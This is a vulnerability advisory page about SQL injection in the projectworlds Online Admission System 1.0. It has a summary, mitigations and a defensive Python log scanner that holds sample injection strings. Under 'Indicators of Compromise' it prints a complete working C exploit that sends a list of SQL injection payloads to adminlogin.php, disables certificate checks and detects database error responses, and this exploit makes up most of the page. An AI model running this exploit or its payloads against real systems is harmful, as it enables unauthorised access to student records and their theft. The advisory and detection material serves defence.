projectworlds Online Admission System 1.0 - SQL Injection
AI Analysis
Technical Summary
The projectworlds Online Admission System 1.0 suffers from an SQL Injection vulnerability, a common web application security flaw where untrusted input is improperly sanitized before being included in SQL queries. This allows attackers to inject malicious SQL code, potentially enabling unauthorized access to the database, data exfiltration, data manipulation, or even full system compromise depending on database permissions. The vulnerability is specifically in the admission system software, which is typically used by educational institutions to manage student admissions and related data. The exploit code is publicly available and written in the C programming language, indicating that attackers can automate exploitation with crafted requests. Although no active exploitation has been reported, the availability of exploit code lowers the barrier for attackers. The lack of patch links suggests that no official fix has been released, increasing the urgency for organizations to implement mitigations. The vulnerability does not require authentication or user interaction, meaning attackers can exploit it remotely and anonymously, increasing its risk profile. Given the sensitive nature of admission data, including personal and academic records, the impact on confidentiality and integrity is significant. The vulnerability is tagged as medium severity, but the ease of exploitation and potential impact warrant close attention.
Potential Impact
For European organizations, particularly educational institutions using the projectworlds Online Admission System or similar platforms, this vulnerability poses a risk of unauthorized data disclosure, including personal student information, academic records, and possibly financial data. Data integrity could be compromised, leading to altered admission records or fraudulent entries. The availability of the system could also be impacted if attackers execute destructive SQL commands or cause database corruption. Such breaches could lead to regulatory penalties under GDPR due to exposure of personal data, reputational damage, and operational disruptions. The risk is heightened in countries with large numbers of educational institutions relying on this software or where digital transformation in education is advanced. Additionally, attackers could leverage this vulnerability as a foothold for further network intrusion, increasing the overall threat to organizational cybersecurity.
Mitigation Recommendations
Organizations should immediately conduct a thorough code audit of the Online Admission System to identify and remediate SQL Injection points. Implement parameterized queries or prepared statements to ensure user inputs are safely handled. Employ rigorous input validation and sanitization on all user-supplied data. Use web application firewalls (WAFs) configured to detect and block SQL Injection attempts. Monitor logs for unusual database query patterns or failed injection attempts. If possible, isolate the admission system database with strict access controls and least privilege principles. Regularly back up databases to enable recovery in case of compromise. Engage with the software vendor or community to seek patches or updates. Educate developers and administrators on secure coding practices to prevent similar vulnerabilities. Finally, consider penetration testing to validate the effectiveness of mitigations.
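The log-monitoring recommendation above, as an added example (not code from the original page or from the exploit author): a Python scan of web access logs for the request shape used by the exploit source listed on this page, adminlogin.php with an a_id parameter carrying URL-encoded, /**/-separated SQL. The combined log format, the a_id allowlist and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: Apache/Nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumption: a legitimate a_id is a short alphanumeric token; tighten to your data.
SAFE_A_ID = re.compile(r"[A-Za-z0-9_]{1,32}")
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
SQL_TOKENS = re.compile(
    r"\b(?:union|select|insert|sleep|exists|substring|database|order\s+by)\b"
    r"|\b(?:or|and)\b\s*['\"\d]"
    r"|@@|--|#|/\*",
    re.IGNORECASE,
)


def normalise(value):
    """Turn /**/ separators into spaces so 'OR/**/1=1' is matched as 'OR 1=1'."""
    return re.sub(r"\s+", " ", INLINE_COMMENT.sub(" ", value)).strip()


def inspect_line(line):
    """Return a finding for a suspicious adminlogin.php request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m["target"])
    if not target.path.lower().endswith("/adminlogin.php"):
        return None
    # parse_qs percent-decodes, so encoded values are inspected in clear form.
    for raw in parse_qs(target.query, keep_blank_values=True).get("a_id", []):
        if SAFE_A_ID.fullmatch(raw):
            continue
        cleaned = normalise(raw)
        reasons = ["outside allowlist"]
        if "/*" in raw:
            reasons.append("inline comment obfuscation")
        if SQL_TOKENS.search(cleaned):
            reasons.append("sql tokens")
        return {"ip": m["ip"], "status": int(m["status"]),
                "a_id": cleaned, "reasons": reasons}
    return None


def scan(lines):
    """Inspect every log line and keep only the findings."""
    return [f for f in map(inspect_line, lines) if f]


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Aug/2025:01:15:36 +0000] "GET /adminlogin.php?a_id=%27%2F%2A%2A%2FOR%2F%2A%2A%2F1%3D1-- HTTP/1.1" 200 5120 "http://example.com" "-"',
    '203.0.113.7 - - [12/Aug/2025:01:15:37 +0000] "GET /adminlogin.php?a_id=%27%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2FNULL%2CNULL-- HTTP/1.1" 200 5133 "http://example.com" "-"',
    '198.51.100.9 - - [12/Aug/2025:08:02:11 +0000] "GET /adminlogin.php?a_id=john.doe%40example.org HTTP/1.1" 200 4876 "-" "-"',
    '198.51.100.20 - - [12/Aug/2025:08:05:40 +0000] "GET /adminlogin.php?a_id=admin01 HTTP/1.1" 200 4876 "-" "-"',
    '198.51.100.20 - - [12/Aug/2025:08:05:41 +0000] "GET /index.php HTTP/1.1" 200 2310 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Findings that carry only "outside allowlist" are input-validation noise worth reviewing; those that also carry "sql tokens" from one source in quick succession match the automated probing the exploit source performs.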
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland
Indicators of Compromise
- exploit-code: /* * Title : projectworlds Online Admission System 1.0 - SQL Injection * Author : Byte Reaper * CVE : CVE-2025-8471 */ #include <stdio.h> #include <string.h> #include <curl/curl.h> #include <stdlib.h> #include "argparse.h" #include <time.h> #define FULL 2200 int verbose = 0; int selCookie = 0; const char *cookies; void sleepAssembly(void) { struct timespec s ; s.tv_sec = 0; s.tv_nsec = 500000000; __asm__ volatile ( "mov $35, %%rax\n\t" "xor %%rsi, %%rsi\n\t" "syscall\n\t" : : "D" (&s) : "rax", "rsi", "memory" ); } void syscallLinux() { __asm__ volatile ( "mov $0x3C, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" : : :"rax", "rdi" ); } struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (tmp == NULL) { fprintf(stderr, "\e[1;31m[-] Failed to allocate memory!\e[0m\n"); syscallLinux(); } m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } int checkLen(int len, char *buf, size_t bufcap) { if (len < 0 || (size_t)len >= bufcap) { printf("\e[0;31m[-] Len is Long ! 
\e[0m\n"); printf("\e[0;31m[-] Len %d\e[0m\n", len); syscallLinux(); return 1; } else { printf("\e[0;34m[+] Len Is Not Long.\e[0m\n"); return 0; } return 0; } // Content Log File (Payload, url, full, http code response) int logFile(const char *payload, const char *urlB, long httpCodeResponse,size_t lenResponse) { FILE *file = fopen("result.log", "a"); if (file == NULL) { printf("\e[0;31m[-] Error Create File (result.log)\e[0m\n"); syscallLinux(); return 1; } printf("\e[0;36m[+] Create Log File Successfully.\e[0m\n"); char content[1500]; int lenG = snprintf(content, sizeof(content), "[+] BASE URL : %s\n[+] PAYLOAD Injection : %s\n[+] http code Response %ld\n[+] Response Len : %zu\n\n", urlB, payload, httpCodeResponse, lenResponse); if (checkLen(lenG,content , sizeof(content)) == 1) { printf("\e[0;31m[-] Len Content is Long !\e[0m\n"); syscallLinux(); return 1; } size_t fw = fwrite(content, 1, strlen(content), file); if (fw != strlen(content)) { printf("\e[0;31m[-] Error Write Content in Log file !\e[0m\n"); syscallLinux(); } printf("\e[0;36m[+] Write Log file Content Successfully.\e[0m\n"); fclose(file); if (verbose) { printf("\e[0;33m[+] Close Log File...\e[0m\n"); } return 0; } // Simple Two Stage Injection Payload const char *twoStageInjection[] = { "INSERT INTO stages (id,code) VALUES (3, 'UNION SELECT NULL --');", "SELECT SLEEP(2);", "SELECT code FROM stages WHERE id = 3;", NULL }; const char *deepInjection_Payload[] = { "'/**/OR/**/1=1--", "'/**/OR/**/'a'='a'--", "'/**/OR/**/1=1/**/AND/**/1=1--", "'/**/OR/**/1=1/**/AND/**/'1'='1'--", "\"/**/OR/**/1=1--", "\"/**/OR/**/1=1/**/AND/**/'a'='a'--", "'/**/UNION/**/SELECT/**/NULL,NULL--", "'/**/AND/**/1=1--", "'/**/AND/**/1=2--", "'/**/AND/**/'1'='1'--", "'/**/AND/**/'1'='2'--", "'/**/AND/**/EXISTS(SELECT/**/1)--", "'/**/OR/**/EXISTS(SELECT/**/1)--", "'/**/OR/**/1=1#", "'/**/OR/**/1=1/*", "'/**/AND/**/1=1/*", "'/**/AND/**/1=2/*", "'/**/OR/**/1=2/*", "'/**/AND/**/SUBSTRING(@@version,1,1)='5'--", 
"'/**/AND/**/SUBSTRING(@@version,1,1)='8'--", "'/**/OR/**/LOWER(database())/**/LIKE/**/'%test%'--", "'/**/OR/**/1=1/**/ORDER/**/BY/**/1--", NULL }; const char *wordSql[] = { "syntax error", "you have an error in your sql syntax", "warning", "mysql_fetch", "mysql_num_rows", "unclosed quotation mark", "quoted string not properly terminated", "sql syntax error", "unexpected end of sql command", "syntax error near", "database error", "query failed", "error in your query", "unknown column", "cannot execute query", "invalid query", "mysql error", "odbc sql", "sqlstate", "ora-", "sql error", "error occurred", "mysql_fetch_array", "native client", "syntax error in string in query expression", "Microsoft OLE DB Provider for SQL Server", "error message", "warning: mysql", "You have an error in your SQL syntax", NULL }; const char **allTechniques[] = { twoStageInjection, deepInjection_Payload, NULL }; size_t payloadInject(const char *urlP) { CURL *curl = curl_easy_init(); CURLcode res; struct Mem response; response.buffer = NULL; response.len = 0; if (curl == NULL || !curl) { printf("\e[0;31m[-] Error Create Object CURL !\e[0m\n"); syscallLinux(); } if (curl) { char full[FULL]; for (int t = 0; allTechniques[t] != NULL; t++) { const char **payloads = allTechniques[t]; printf("\e[0;35m\n[+] Technique %d:\e[0m\n", t); for (int f = 0; payloads[f] != NULL; f++) { const char *pl = payloads[f]; char *encode = curl_easy_escape(curl, payloads[f], strlen(payloads[f])); if (!encode) { printf("\e[0;31m[-] Error Encode Payload !\e[0m\n"); syscallLinux(); } printf("\e[0;37m[+] Encode Payload : %s\e[0m\n", encode); int lenF = snprintf(full, sizeof(full), "%s/adminlogin.php?a_id=%s",urlP, encode); if (checkLen(lenF, full,sizeof(full)) == 1) { printf("\e[0;31m[-] Len full URL is Long !\e[0m"); syscallLinux(); } printf("\e[0;37m[+] Full URL : %s\e[0m\n", full); curl_easy_setopt(curl, CURLOPT_URL, full); if (selCookie) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); 
curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } curl_easy_setopt(curl, CURLOPT_ACCEPT_ENCODING, ""); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); sleepAssembly(); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); if (verbose) { printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } struct curl_slist *h = NULL; h = curl_slist_append(h, "Accept: text/html"); h = curl_slist_append(h, "Accept-Encoding: gzip, deflate, br"); h = curl_slist_append(h, "Accept-Language: en-US,en;q=0.5"); h = curl_slist_append(h, "Connection: keep-alive"); h = curl_slist_append(h, "Referer: http://example.com"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h); res = curl_easy_perform(curl); curl_slist_free_all(h); curl_free(encode); if (res == CURLE_OK) { long httpCode = 0; logFile(payloads[f], urlP, httpCode, response.len); char *u = NULL; curl_easy_getinfo(curl, CURLINFO_REDIRECT_URL, &u); printf("\e[0;37m--------------------------------------------------------------------------------------------------------\n"); printf("\e[1;36m[+] Request sent successfully\e[0m\n"); curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode); printf("\e[1;32m-> Http Code : %ld\e[0m\n", httpCode); printf("\e[0;35m[+] Check Redirect : ======================\e[0m\n"); if (u) { printf("\e[0;34m[+] Redirect Page Detected .\e[0m\n"); } else { printf("\e[0;31m[-] Redirect Page Not Detected !\e[0m\n"); } printf("\e[0;35m==========================================\e[0m\n"); if (httpCode >= 200 && httpCode < 300) { printf("\e[0;32m[+] Http Code (200 < 300) : %ld\e[0m\n", httpCode); if (verbose) { if (response.buffer) { 
printf("\e[1;37m\n======================================== [Response ] ========================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;32m[Len] : %zu\e[0m\n", response.len); printf("\e[1;37m\n=============================================================================================\e[0m\n"); } } for (int j = 0; wordSql[j] != NULL; j++) { if (response.buffer) { if (strstr(response.buffer, wordSql[j]) != NULL) { printf("\e[0;34m[+] Word Found In Response \e[0m\n"); printf("\e[0;34m[+] Word : %s\e[0m\n", wordSql[j]); printf("\e[1;35m==================================== [WORD FOUND RESPONSE] ====================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;32m[+] Response Len : %zu\e[0m\n", response.len); printf("\e[1;35m===============================================================================================\e[0m\n\n"); } else { printf("\e[0;31m[-] Not Found Word : %s\e[0m\n", wordSql[j]); } } } return response.len; } else { printf("\e[0;31m[-] Negative response code (%ld)!\e[0m\n", httpCode); } } else { printf("\e[1;31m[-] The request was not sent !\e[0m\n"); printf("\e[1;31m[-] Error : %s\n", curl_easy_strerror(res)); syscallLinux(); } } } curl_easy_cleanup(curl); if (response.buffer) { free(response.buffer); response.buffer = NULL; response.len = 0; } } } size_t simpleRequest(const char *urls) { CURL *curl = curl_easy_init(); struct Mem responseS ; responseS.buffer = NULL; responseS.len = 0; if (curl == NULL || !curl) { syscallLinux(); } if (curl) { char full[FULL]; CURLcode res; int lenS = snprintf(full, sizeof(full), "%s/adminlogin.php", urls ); if (checkLen(lenS, full, sizeof(full)) == 1) { printf("\e[0;31m[-] Error Create Full url (Len is Long)\e[0m\n"); syscallLinux(); } else { printf("\e[0;34m[+] Full URL created successfully.\e[0m\n"); } curl_easy_setopt(curl, CURLOPT_URL, full); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); 
curl_easy_setopt(curl, CURLOPT_WRITEDATA, &responseS); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); if (verbose) { printf("\e[1;35m------------------------------------------[VERBOSE CURL]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } struct curl_slist *headers = NULL; char host[130]; char ref[150]; char ipDomain[400]; if (sscanf(urls, "%*[^:]://%[^/]", ipDomain) == 1) { printf("\e[0;34m[+] Get Host URL Successfully \e[0m\n"); printf("\e[0;34m[+] HOST Header Content : %s\e[0m\n", ipDomain); headers = curl_slist_append(headers, ipDomain); } else { printf("\e[1;31m[-] Error Get Target Ip In FULL URL !\e[0m\n"); printf("\e[0;31m[-] Host Header Not modified !\e[0m\n"); printf("\e[0;31m[-] HOST : NULL\e[0m\n"); } headers = curl_slist_append(headers, "Accept: text/html"); headers = curl_slist_append(headers, "Accept-Encoding: gzip"); headers = curl_slist_append(headers, "Accept-Language: en-US,en"); headers = curl_slist_append(headers, "Connection: keep-alive"); int lenR = snprintf(ref, sizeof(ref), "Referer: %s", full); if (checkLen(lenR, ref, sizeof(ref)) == 1) { printf("\e[0;31m[-] HEADER Referer Not modified !\n"); printf("\e[0;31m[-] DEFAULT HEADER Referer (http://exemple.com)\n"); headers = curl_slist_append(headers, "Referer: http://example.com"); } else { printf("\e[0;34m[+] Header Referer modified Successfully.\e[0m\n"); printf("\e[0;34m[+] Header Result (Referer) : %s\e[0m\n", ref); headers = curl_slist_append(headers, ref); } headers = curl_slist_append(headers, "Cache-Control: no-cache"); headers = curl_slist_append(headers, "Connection: keep-alive"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers); res = curl_easy_perform(curl); curl_slist_free_all(headers); long code = 0; if (res == CURLE_OK) { curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &code); printf("\e[1;36m[+] Request sent successfully\e[0m\n"); printf("\e[1;32m[+] Http Code : %ld\e[0m\n", code); if (responseS.buffer) { if (verbose) { 
printf("\e[4;34m========================================= [SIMPLE REQUEST] =========================================\e[0m\n"); printf("%s\n", responseS.buffer); printf("\e[4;34m====================================================================================================\e[0m\n"); } printf("\e[0;34m[+] Regular order length : %zu\e[0m\n", responseS.len); } else { printf("\e[0;31m[-] Response is NULL !\e[0m\n"); } return responseS.len; } else { printf("\e[1;31m[-] Error Send Request !\e[0m\n"); printf("\e[1;31m[-] Error : %s\e[0m\n", curl_easy_strerror(res)); } } if (responseS.buffer) { free(responseS.buffer); responseS.buffer = NULL; responseS.len = 0; } curl_easy_cleanup(curl); } void value(const char *url) { size_t autoLen = simpleRequest(url); printf("\e[0;35m[+] Result Len Size (Regular order) : %zu\e[0m\n",autoLen); size_t lenInjectResponse = payloadInject(url); printf("\e[0;37m+-------------------------------------------------------------------------------------+\e[0m\n"); printf("\e[0;33m[+] Length comparison result (not a definitive criterion for successful injection)\n"); if (autoLen != lenInjectResponse) { printf("\e[0;34m[+] Length not compatible.\e[0m\n"); printf("\e[0;34m[+] Successfully injected via length measurement technique (%zu =! %zu)\n", autoLen,lenInjectResponse); } else { printf("\e[0;31m[-] No difference in length was detected !\e[0m\n"); printf("\e[0;31m[-] The length is similar in normal response and injection response (%zu =! 
%zu)\e[0m\n", autoLen,lenInjectResponse); } printf("\e[0;37m+-------------------------------------------------------------------------------------+\e[0m\n"); } int main(int argc, const char **argv) { printf( "\e[1;31m" "$$$$$$\\ $$\\ $$\\ $$$$$$$$\\ $$$$$$\\ $$$$$$\\ $$$$$$\\ $$$$$$$\\ $$$$$$\\ $$\\ $$\\ $$$$$$$$\\ $$\\ \n" "$$ __$$\\ $$ | $$ |$$ _____| $$ __$$\\ $$$ __$$\\ $$ __$$\\ $$ ____| $$ __$$\\ $$ | $$ |\\____$$ |$$$$ | \n" "$$ / \\__|$$ | $$ |$$ | \\__/ $$ |$$$$\\ $$ |\\__/ $$ |$$ | $$ / $$ |$$ | $$ | $$ / \\_$$ | \n" "$$ | \\$$\\ $$ |$$$$$\\ $$$$$$\\ $$$$$$ |$$\\$$\\$$ | $$$$$$ |$$$$$$$\\ $$$$$$\\ $$$$$$ |$$$$$$$$ | $$ / $$ | \n" "$$ | \\$$\\$$ / $$ __|\\______|$$ ____/ $$ \\$$$$ |$$ ____/ \\_____$$\\______|$$ __$$< \\_____$$ | $$ / $$ | \n" "$$ | $$\\ \\$$$ / $$ | $$ | $$ |\\$$$ |$$ | $$\\ $$ | $$ / $$ | $$ | $$ / $$ | \n" "\\$$$$$$ | \\$ / $$$$$$$$\\ $$$$$$$$\\ \\$$$$$$ /$$$$$$$$\\ \\$$$$$$ | \\$$$$$$ | $$ |$$ / $$$$$$\\ \n" " \\______/ \\_/ \\________| \\________| \\______/ \\________| \\______/ \\______/ \\_|\\__/ \\______| \n" "\e[1;37m \t\t\t\t\t\t\t\t\t\t\t\t Byte Reaper\n" ); printf("\e[1;31m---------------------------------------------------------------------------------------------------------------------------------------\n"); const char *baseurl = NULL; const char *nameFileC = NULL; struct argparse_option options[] = { OPT_HELP(), OPT_STRING('u', "url", &baseurl, "Enter Target Url (BASE URL)"), OPT_STRING('c', "cookies", &nameFileC, "Enter File cookies"), OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (!baseurl) { printf("\e[1;31m[-] Please Enter target Url !\e[0m\n"); printf("\e[1;31m[-] Example : ./exploit -u http://<TARGET>\e[0m\n"); syscallLinux(); } if (nameFileC) { selCookie = 1; } if (verbose) { verbose = 1; } value(baseurl); return 0; }
Technical Details
- Edb Id: 52398
- Has Exploit Code: true
- Code Language: c
Threat ID: 689a95b8ad5a09ad002b09a8
Added to database: 8/12/2025, 1:15:36 AM
Last enriched: 11/3/2025, 9:41:36 AM
Last updated: 11/11/2025, 11:32:00 AM